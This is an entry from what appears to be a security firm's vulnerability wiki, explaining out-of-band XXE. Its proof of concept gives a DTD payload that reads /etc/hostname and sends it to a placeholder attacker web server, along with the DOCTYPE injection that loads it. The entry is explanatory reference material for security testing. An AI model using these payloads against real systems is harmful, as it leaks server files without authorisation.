Cobalt Vulnerability Wiki
Cobalt Vulnerability Wiki
Categories
V2 - AuthenticationV3 - Session ManagementV4 - Access ControlV5 - Validation/Sanitization Blind SQL injectionClickjackingCommand Injection Cookie-Based XSS Cross Site Script Inclusion (XSSI)CSRF/URL-Based XSS CSS injectionCSV Injection DOM-Based XSSFlash-Based XSS HTML injection HTTP Parameter Pollution to XSS HTTP Request Smuggling HTTP Response Splitting (CRLF)iframe InjectionLDAP injection Local File InclusionOOB (Out of Band) XXEOpen Redirect Reflected File Download (RFD) Reflected Self-XSSReflected XSS Reflected XSS - WAF bypassRemote Code ExecutionRemote File InclusionRosetta FlashServer Side Template InjectionServer Side Template Injection (SSTI) in Flask SQL Injection SSI InjectionSSRF Stored XSSTabnabbing TRACE Method XSS - Cross-Site Tracing (XST) Universal (UXSS) XSS WAF Bypass XSS via RefererXXE
V6 - CryptographyV7 - Error LoggingV8 - Data ProtectionV9 - CommunicationsV10 - Malicious CodeV11 - Business LogicV12 - Files ResourcesV13 - APIV14 - ConfigV5 - Validation/Sanitization
OOB (Out of Band) XXE
POC
Create a payload.dtd file with the following content and host it on your server.
<!ENTITY % file SYSTEM "file:///etc/hostname"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://<WebserverIP>/?x=%file;'>">%eval;
In the vulnerable website, add the following to the input area:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<myipaddress>/payload.dtd"> %xxe;]>
Then check the web server access logs. Firstly, the XML parser will load the dtd file and then it will leak the hostname to the attacker:
Impact
High
Likelihood
High
Ready to get started?
Join some of these great clients we're proud to have helped